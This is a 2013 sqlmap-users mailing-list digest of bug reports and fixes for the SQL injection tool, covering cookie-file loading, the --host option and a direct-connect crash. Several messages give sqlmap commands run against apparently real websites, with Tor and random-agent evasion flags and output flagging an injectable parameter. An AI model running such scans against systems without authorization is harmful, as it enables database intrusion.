>         >     >     Content-Type: application/x-www-form-urlencoded
 >         >     >     Content-Length: 67
>         >     >
>         >     >     <abunchofpostparams>
>         >     >
>         >     >
>         >     >     No hints that cookie-file is not in correct format (I've been through this,
 >         >     >     at least I think I so ;) ).
>         >     >
>         >     >     Any insight would be much appreciated.
>         >     >
>         >     >
 >         >     >     Cheers,
>         >     >
>         >     >     Dirk
>         >     >
>         >     >
>         >     >     ------------------------------------------------------------------------------
 >         >     >     Precog is a next-generation analytics platform capable of advanced
>         >     >     analytics on semi-structured data. The platform includes APIs for building
>         >     >     apps and a phenomenal toolset for data science. Developers can use
 >         >     >     our toolset for easy data analysis & visualization. Get a free account!
>         >     >     http://www2.precog.com/precogplatform/slashdotnewsletter
 >         >     >     _______________________________________________
>         >     >     sqlmap-users mailing list
>         >     >     sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>>>
 >         >     >     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>         >     >
>         >     >
 >         >     >
>         >     >
>         >     > --
>         >     > Miroslav Stampar
>         >     > http://about.me/stamparm
 >         >
>         >
>         >
>         >
>         > --
>         > Miroslav Stampar
>         > http://about.me/stamparm
 >
>
>
>
>     -- 
>     Miroslav Stampar
>     http://about.me/stamparm
>
>
>
>
> -- 
> Miroslav Stampar
 > http://about.me/stamparm




------------------------------

Message: 3
Date: Mon, 15 Apr 2013 11:45:19 +0200
From: Miroslav Stampar <mir...@gm...>
 Subject: Re: [sqlmap-users] --load-cookies
To: Dirk Wetter <sp...@dr...>
Cc: SqlMap List <sql...@li...>
 Message-ID:
	<CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
Content-Type: text/plain; charset="iso-8859-1"

Hi Dirk.
 
Now that crash should be "patched".

Could you please retry it now and say if the latest revision suits your
needs?

Kind regards,
Miroslav Stampar


On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:
 
>
>
> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > Nevertheless, with the latest commit that check should be "neutralized"
> now. Could you please retry it now?
>
 > thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib
> hiccups, using the same file:
>
> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
> Traceback (most recent call last):
 >   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> _really_load
>     assert domain_specified == initial_dot
> AssertionError
>
>   _warn_unhandled_exception()
 > [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
> Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
 >
> the 999.. looks strange to me.
>
> >
> >
> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> mir...@gm... <mailto:mir...@gm...>> wrote:
 > >
> >     Hi Dirk.
> >
> >     Well, I would say that you have an expired cookie. Do you see that
> value 0? That value should be a valid UNIX time representing time of cookie
 > expiration. Also, I've just tested that cookie of yours and sqlmap says:
 > "[WARNING] cookie '....' has expired"
> >
>
> that's true but IMO 0 represents just a session cookie. Example:
>
> prompt% wget -q -O /dev/null --keep-session-cookies
 > --save-cookies=/dev/stdout bing.com
> # HTTP cookie file.
> # Generated by Wget on 2013-04-15 11:23:13.
> # Edit at your own risk.
>
> .bing.com       TRUE    /       FALSE   1429089794      SRCHUSR
 > AUTOREDIR=0&GEOVAR=&DOB=20130415
> .bing.com       TRUE    /       FALSE   1429089794      SRCHD
> D=2781203&MS=2781203&AF=NOFORM
> .bing.com       TRUE    /       FALSE   1429089794      OrigMUID
 >  333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> .bing.com       TRUE    /       FALSE   1429089794      MUID
>  333995A69E06630B2EB491169F016314
 > .bing.com       TRUE    /       FALSE   0       _SS
> SID=B954CB7EDF8643CABAD8013F27A241E7
> .bing.com       TRUE    /       FALSE   0       _HOP
 > .bing.com       TRUE    /       FALSE   0       _FS     NU=1
> .bing.com       TRUE    /       FALSE   1429089794      _FP     EM=1
 > www.bing.com    FALSE   /       FALSE   1429089794      SRCHUID
> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> www.bing.com    FALSE   /       FALSE   1429089794      MUIDB
 > 333995A69E06630B2EB491169F016314
>
> prompt%
>
> Same parser problem btw if I edit the cookie file and put 1429089794 unix
> time instead of 0 in there.
>
> Ok: With the prev rev  ed5599f it reads this file ok (no session cookies
 > but cookies w/ expiration date) and uses the last
> cookie only for the first 120 tries.
>
> Cheers, Dirk
>
>
> >
> >     Kind regards,
> >     Miroslav Stampar
 > >
> >
> >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
> sp...@dr...>> wrote:
 > >
> >
> >         Hi Miroslav,
> >
> >         thx for your prompt answer.
> >
> >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> >         > Hi Dirk.
 > >         >
> >         > Could you please get the latest revision and retry it again?
> >         ed5599f: almost the same: with cookie in the header sqlmap takes
> only this one.
 > >         The slight difference seems to be that in the case where I
> didn't supply a cookie
> >         sqlmap doesn't use any cookie at all, i.e. now not the one from
> the server anymore.
 > >         >
> >         > There was a situation where info messages have been wrongly
> written that original response contained Set-Cookie in situations like
> yours.
> >         >
 > >         > In case that everything stays as it is, I'll need to ask you
> to provide more details. For example, cookie file would be great.
> >
> >         sure, here you go:
> >
 > >         --snip
> >         # Netscape HTTP Cookie File
> >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID
>  \t  <Cookie>
> >         [..]
 > >         --snap
> >
> >         They are all session cookies. For easier reading here I put some
> blanks in the line
> >         above, in "cookie-file" there aren't any though. Cookies were
 > generated with
> >         stompy and a shell script (looks he same as with
> >         wget -S -O /dev/null --keep-session-cookies
> --save-cookies=<file> <URL>)
> >
 > >         Again: sqlmap doesn't hiccup/complain while eating my cookies
 > file ;-)
> >
> >         >
> >         > Also, please make sure that the cookie file contains proper
> cookie(s) - domain name should be the same as a domain of target, cookie
 > needs to have a proper valid time, etc.
> >
> >         see above.
> >
> >         Cheers,
> >
> >         Dirk
> >
> >         >
> >         >
 > >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
 > sp...@dr...>>> wrote:
> >         >
> >         >     Hi Miroslav,
> >         >
> >         >     yes unfortunately.
 > >         >
> >         >     If I omit the cookie line in the request header
> completely, sqlmap
> >         >     seems to take the first cookie issued by the server with
> set-cookie (and
 > >         >     put's it silently in).
> >         >
> >         >     Cheers,
> >         >
> >         >     Dirk
> >         >
> >         >
 > >         >
> >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> >         >     > Hi.
> >         >     >
> >         >     > And this is also happening if you are skipping "Cookie:
 > JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> >         >     >
> >         >     > Kind regards,
> >         >     > Miroslav Stampar
 > >         >     >
> >         >     >
> >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
 > sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
 > <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> >         >     >
 > >         >     >
> >         >     >     Hi folks,
> >         >     >
> >         >     >     .... that doesn't work for me. It always uses the
> cookie supplied
 > >         >     >     (below in $REQUEST, or if I omit the line in
> $REQUEST the one
> >         >     >     from the 1st server reply is being used)
> >         >     >
 > >         >     >     So what is wrong in here:
> >         >     >
> >         >     >     cd
> ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
 > >         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> >         >     >       --level=2 --risk=2 -r $REQUEST
> >         >     >
> >         >     >     The content of the file $REQUEST is:
 > >         >     >
> >         >     >     POST <URL> HTTP/1.1
> >         >     >     Host: <HOST>
> >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2;
 > en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <
 > http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> >         >     >     Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 > >         >     >     Accept-Language: en-US,en;q=0.5
> >         >     >     Accept-Encoding: gzip, deflate
> >         >     >     Referer: <Referer>
> >         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
 > >         >     >     Connection: keep-alive
> >         >     >     Content-Type: application/x-www-form-urlencoded
> >         >     >     Content-Length: 67
> >         >     >
 > >         >     >     <abunchofpostparams>
> >         >     >
> >         >     >
> >         >     >     No hints that cookie-file is not in correct format
 > (I've been through this,
> >         >     >     at least I think I so ;) ).
> >         >     >
> >         >     >     Any insight would be much appreciated.
> >         >     >
 > >         >     >
> >         >     >     Cheers,
> >         >     >
> >         >     >     Dirk
> >         >     >
> >         >     >
 > >         >     >
> ------------------------------------------------------------------------------
> >         >     >     Precog is a next-generation analytics platform
> capable of advanced
 > >         >     >     analytics on semi-structured data. The platform
> includes APIs for building
> >         >     >     apps and a phenomenal toolset for data science.
> Developers can use
 > >         >     >     our toolset for easy data analysis & visualization.
> Get a free account!
> >         >     >
> http://www2.precog.com/precogplatform/slashdotnewsletter
 > >         >     >     _______________________________________________
> >         >     >     sqlmap-users mailing list
> >         >     >     sql...@li... <mailto:
 > sql...@li...> <mailto:
> sql...@li... <mailto:
 > sql...@li...>> <mailto:
> sql...@li... <mailto:
 > sql...@li...> <mailto:
> sql...@li... <mailto:
 > sql...@li...>>>
> >         >     >
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
 > >         >     >
> >         >     >
> >         >     >
> >         >     >
> >         >     > --
> >         >     > Miroslav Stampar
 > >         >     > http://about.me/stamparm
> >         >
> >         >
> >         >
> >         >
> >         > --
 > >         > Miroslav Stampar
> >         > http://about.me/stamparm
> >
> >
> >
> >
> >     --
 > >     Miroslav Stampar
> >     http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
 > > http://about.me/stamparm
>
>


-- 
Miroslav Stampar
http://about.me/stamparm
 -------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 4
Date: Mon, 15 Apr 2013 11:46:21 +0200
From: Miroslav Stampar <mir...@gm...>
 Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in
	clean_filesystem
To: Brandon Perry <bpe...@gm...>
Cc: sqlmap users <sql...@li...>
 Message-ID:
	<CA+9yoX3RNQDm=PqT...@ma...>
Content-Type: text/plain; charset="iso-8859-1"
 
Hi Brandon.

Thank you for your patch and find it now included [1].

Kind regards,
Miroslav Stampar

[1]
https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224
 

On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm...>wrote:

> Hi, the attached patch fixes an issue with the /task/<task_id>/delete api
 > call when self.output_directory is NoneType and clean_system() is called.
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
 >
>
> ------------------------------------------------------------------------------
> Precog is a next-generation analytics platform capable of advanced
> analytics on semi-structured data. The platform includes APIs for building
 > apps and a phenomenal toolset for data science. Developers can use
> our toolset for easy data analysis & visualization. Get a free account!
> http://www2.precog.com/precogplatform/slashdotnewsletter
 > _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
 >
>


-- 
Miroslav Stampar
http://about.me/stamparm
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------
 
Message: 5
Date: Mon, 15 Apr 2013 12:19:13 +0200
From: Dirk Wetter <sp...@dr...>
Subject: Re: [sqlmap-users] --load-cookies
To: Miroslav Stampar <mir...@gm...>
 Cc: SqlMap List <sql...@li...>
Message-ID: <516...@dr...>
 Content-Type: text/plain; charset=ISO-8859-1

Hi Miroslav,

On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
> Hi Dirk.
>
> Now that crash should be "patched".
>
> Could you please retry it now and say if the latest revision suits your needs?
 
cool, thx. Works!

However (sorry):

One needs to omit the cookie in the request header, otherwise it just uses the one
supplied by the request.

Then: It doesn't change the cookie. Maybe I was interpreting that not correctly
 but my point was using the load-cookies option to direct sqlmap to change
cookies once in a while (whenever that's gonna be). This is to circumvent
restrictions one can encounter otherwise....

Cheers,
 
Dirk


>
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...>> wrote:
 >
>
>
>     On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>     > Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?
>
 >     thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib hiccups, using the same file:
>
>     /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
>     Traceback (most recent call last):
 >       File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
>         assert domain_specified == initial_dot
>     AssertionError
>
>       _warn_unhandled_exception()
 >     [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
 >
>     the 999.. looks strange to me.
>
>     >
>     >
>     > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm... <mailto:mir...@gm...> <mailto:mir...@gm... <mailto:mir...@gm...>>> wrote:
 >     >
>     >     Hi Dirk.
>     >
>     >     Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
 >     >
>
>     that's true but IMO 0 represents just a session cookie. Example:
>
>     prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com <http://bing.com>
 >     # HTTP cookie file.
>     # Generated by Wget on 2013-04-15 11:23:13.
>     # Edit at your own risk.
>
>     .bing.com <http://bing.com>       TRUE    /       FALSE   1429089794      SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
 >     .bing.com <http://bing.com>       TRUE    /       FALSE   1429089794      SRCHD   D=2781203&MS=2781203&AF=NOFORM
 >     .bing.com <http://bing.com>       TRUE    /       FALSE   1429089794      OrigMUID        333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
 >     .bing.com <http://bing.com>       TRUE    /       FALSE   1429089794      MUID    333995A69E06630B2EB491169F016314
 >     .bing.com <http://bing.com>       TRUE    /       FALSE   0       _SS     SID=B954CB7EDF8643CABAD8013F27A241E7
 >     .bing.com <http://bing.com>       TRUE    /       FALSE   0       _HOP
>     .bing.com <http://bing.com>       TRUE    /       FALSE   0       _FS     NU=1
 >     .bing.com <http://bing.com>       TRUE    /       FALSE   1429089794      _FP     EM=1
>     www.bing.com <http://www.bing.com>    FALSE   /       FALSE   1429089794      SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
 >     www.bing.com <http://www.bing.com>    FALSE   /       FALSE   1429089794      MUIDB   333995A69E06630B2EB491169F016314
 >
>     prompt%
>
>     Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.
>
>     Ok: With the prev rev  ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last
 >     cookie only for the first 120 tries.
>
>     Cheers, Dirk
>
>
>     >
>     >     Kind regards,
>     >     Miroslav Stampar
>     >
>     >
 >     >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>> wrote:
 >     >
>     >
>     >         Hi Miroslav,
>     >
>     >         thx for your prompt answer.
>     >
>     >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
 >     >         > Hi Dirk.
>     >         >
>     >         > Could you please get the latest revision and retry it again?
>     >         ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
 >     >         The slight difference seems to be that in the case where I didn't supply a cookie
>     >         sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
 >     >         >
>     >         > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
>     >         >
 >     >         > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
>     >
>     >         sure, here you go:
 >     >
>     >         --snip
>     >         # Netscape HTTP Cookie File
>     >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID  \t  <Cookie>
 >     >         [..]
>     >         --snap
>     >
>     >         They are all session cookies. For easier reading here I put some blanks in the line
>     >         above, in "cookie-file" there aren't any though. Cookies were generated with
 >     >         stompy and a shell script (looks he same as with
>     >         wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
>     >
>     >         Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
 >     >
>     >         >
>     >         > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
 >     >
>     >         see above.
>     >
>     >         Cheers,
>     >
>     >         Dirk
>     >
>     >         >
>     >         >
 >     >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
 >     >         >
>     >         >     Hi Miroslav,
>     >         >
>     >         >     yes unfortunately.
>     >         >
>     >         >     If I omit the cookie line in the request header completely, sqlmap
 >     >         >     seems to take the first cookie issued by the server with set-cookie (and
>     >         >     put's it silently in).
>     >         >
>     >         >     Cheers,
 >     >         >
>     >         >     Dirk
>     >         >
>     >         >
>     >         >
>     >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
 >     >         >     > Hi.
>     >         >     >
>     >         >     > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
 >     >         >     >
>     >         >     > Kind regards,
>     >         >     > Miroslav Stampar
>     >         >     >
>     >         >     >
 >     >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>>> wrote:
 >     >         >     >
>     >         >     >
>     >         >     >     Hi folks,
>     >         >     >
>     >         >     >     .... that doesn't work for me. It always uses the cookie supplied
 >     >         >     >     (below in $REQUEST, or if I omit the line in $REQUEST the one
>     >         >     >     from the 1st server reply is being used)
>     >         >     >
 >     >         >     >     So what is wrong in here:
>     >         >     >
>     >         >     >     cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>     >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
 >     >         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>     >         >     >       --level=2 --risk=2 -r $REQUEST
>     >         >     >
>     >         >     >     The content of the file $REQUEST is:
 >     >         >     >
>     >         >     >     POST <URL> HTTP/1.1
>     >         >     >     Host: <HOST>
>     >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko)
 >     >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> Safari/525.13
 >     >         >     >     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>     >         >     >     Accept-Language: en-US,en;q=0.5
>     >         >     >     Accept-Encoding: gzip, deflate
 >     >         >     >     Referer: <Referer>
>     >         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>     >         >     >     Connection: keep-alive
 >     >         >     >     Content-Type: application/x-www-form-urlencoded
>     >         >     >     Content-Length: 67
>     >         >     >
>     >         >     >     <abunchofpostparams>
 >     >         >     >
>     >         >     >
>     >         >     >     No hints that cookie-file is not in correct format (I've been through this,
>     >         >     >     at least I think I so ;) ).
 >     >         >     >
>     >         >     >     Any insight would be much appreciated.
>     >         >     >
>     >         >     >
>     >         >     >     Cheers,
 >     >         >     >
>     >         >     >     Dirk
>     >         >     >
>     >         >     >
>     >         >     >     ------------------------------------------------------------------------------
 >     >         >     >     Precog is a next-generation analytics platform capable of advanced
>     >         >     >     analytics on semi-structured data. The platform includes APIs for building
 >     >         >     >     apps and a phenomenal toolset for data science. Developers can use
>     >         >     >     our toolset for easy data analysis & visualization. Get a free account!
 >     >         >     >     http://www2.precog.com/precogplatform/slashdotnewsletter
>     >         >     >     _______________________________________________
 >     >         >     >     sqlmap-users mailing list
>     >         >     >     sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>>>>
 >     >         >     >     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>     >         >     >
 >     >         >     >
>     >         >     >
>     >         >     >
>     >         >     > --
>     >         >     > Miroslav Stampar
>     >         >     > http://about.me/stamparm
 >     >         >
>     >         >
>     >         >
>     >         >
>     >         > --
>     >         > Miroslav Stampar
>     >         > http://about.me/stamparm
 >     >
>     >
>     >
>     >
>     >     --
>     >     Miroslav Stampar
>     >     http://about.me/stamparm
 >     >
>     >
>     >
>     >
>     > --
>     > Miroslav Stampar
>     > http://about.me/stamparm
>
 >
>
>
> -- 
> Miroslav Stampar
> http://about.me/stamparm




------------------------------

Message: 6
Date: Mon, 15 Apr 2013 14:01:01 -0700
 From: <co...@5i...>
Subject: [sqlmap-users] --host parameter
To: sql...@li...
 Message-ID:
	<201...@em...>
 	
Content-Type: text/plain; charset="utf-8"

Hello,
the --host doesn't work as expected, or I am doing something wrong:


this works as expected:

./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
 
    sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without
 prior mutual consent is illegal. It is the end user's responsibility to
obey all applicable local, state and federal laws. Developers assume no
liability and are not responsible for any misuse or damage caused by
 this program

[*] starting at 23:57:15

[23:57:15] [INFO] testing connection to the target URL
[23:57:15] [INFO] heuristics detected web page charset 'ascii'
[23:57:15] [INFO] testing if the target URL is stable. This can take a
 couple of seconds
[23:57:16] [INFO] target URL is stable
[23:57:16] [INFO] testing if GET parameter 'id' is dynamic
[23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
[23:57:16] [INFO] GET parameter 'id' is dynamic
 [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
might be injectable (possible DBMS: 'MySQL')
[23:57:16] [INFO] testing for SQL injection on GET parameter 'id'


 ....


this doesn't work as expected:

 ./sqlmap.py --host='i.csland.ro'
--url='http://188.240.236.15/index.php?id=0'
 
    sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without
 prior mutual consent is illegal. It is the end user's responsibility to
obey all applicable local, state and federal laws. Developers assume no
liability and are not responsible for any misuse or damage caused by
 this program

[*] starting at 23:58:03

[23:58:03] [INFO] testing connection to the target URL
[23:58:03] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to
 quit and make sure that everything is set up properly? [Y/n]
[23:58:05] [WARNING] HTTP error codes detected during run:

............


Of course i.csland.ro resolves to 188.240.236.15. Any idea?
 
Thanks.




------------------------------

Message: 7
Date: Tue, 16 Apr 2013 09:12:05 +1100
From: ???????? ?????? <vo...@s2...>
 Subject: [sqlmap-users] Sqlmap and direct connect error
 To: sql...@li...
Message-ID: <C59...@s2...>
 Content-Type: text/plain; charset=us-ascii

Hi!

This bug detected if add direct param.

python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux  --tables --exclude-sysdbs
 

[01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
 sqlmap version: 1.0-dev-de99717
Python version: 2.7.3
Operating system: posix
Command line: sqlmap.py -d **************************************************** -u http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs
 Technique: None
Back-end DBMS: MySQL (identified)
Traceback (most recent call last):
  File "sqlmap.py", line 87, in main
    start()
  File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in start
     action()
  File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
    setHandler()
  File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in setHandler
    conf.dbmsConnector.connect()
   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in connect
    self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)
   File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", line 93, in Connect
    return Connection(*args, **kwargs)
  File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 584, in __init__
     self._connect()
  File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 739, in _connect
    sock.connect((self.host, self.port))
  File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in connect
     raise GeneralProxyError((5, _generalerrors[5]))
GeneralProxyError: (5, 'bad input')




------------------------------

Message: 8
Date: Tue, 16 Apr 2013 14:19:18 +0200
From: Miroslav Stampar <mir...@gm...>
 Subject: Re: [sqlmap-users] --host parameter
To: co...@5i...
Cc: SqlMap List <sql...@li...>
 Message-ID:
	<CA+...@ma...>
Content-Type: text/plain; charset="iso-8859-1"
 
Hi.

Thank you for your report and find it fixed with the latest commit [1].

Kind regards,
Miroslav Stampar

[1]
https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86
 

On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote:

> Hello,
> the --host doesn't work as expected, or I am doing something wrong:
 >
>
> this works as expected:
>
> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>
>     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
 > takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
 > obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
> this program
>
> [*] starting at 23:57:15
>
 > [23:57:15] [INFO] testing connection to the target URL
> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
> [23:57:15] [INFO] testing if the target URL is stable. This can take a
 > couple of seconds
> [23:57:16] [INFO] target URL is stable
> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
 > [23:57:16] [INFO] GET parameter 'id' is dynamic
> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
> might be injectable (possible DBMS: 'MySQL')
> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
 >
>
> ....
>
>
> this doesn't work as expected:
>
>  ./sqlmap.py --host='i.csland.ro'
> --url='http://188.240.236.15/index.php?id=0'
 >
>     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
 > prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
 > this program
>
> [*] starting at 23:58:03
>
> [23:58:03] [INFO] testing connection to the target URL
> [23:58:03] [CRITICAL] page not found (404)
> it is not recommended to continue in this kind of cases. Do you want to
 > quit and make sure that everything is set up properly? [Y/n]
> [23:58:05] [WARNING] HTTP error codes detected during run:
>
> ............
>
>
> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
 >
> Thanks.
>
>
>
> ------------------------------------------------------------------------------
> Precog is a next-generation analytics platform capable of advanced
> analytics on semi-structured data. The platform includes APIs for building
 > apps and a phenomenal toolset for data science. Developers can use
> our toolset for easy data analysis & visualization. Get a free account!
> http://www2.precog.com/precogplatform/slashdotnewsletter
 > _______________________________________________
> sqlmap-users mailing list
> sql...@li...
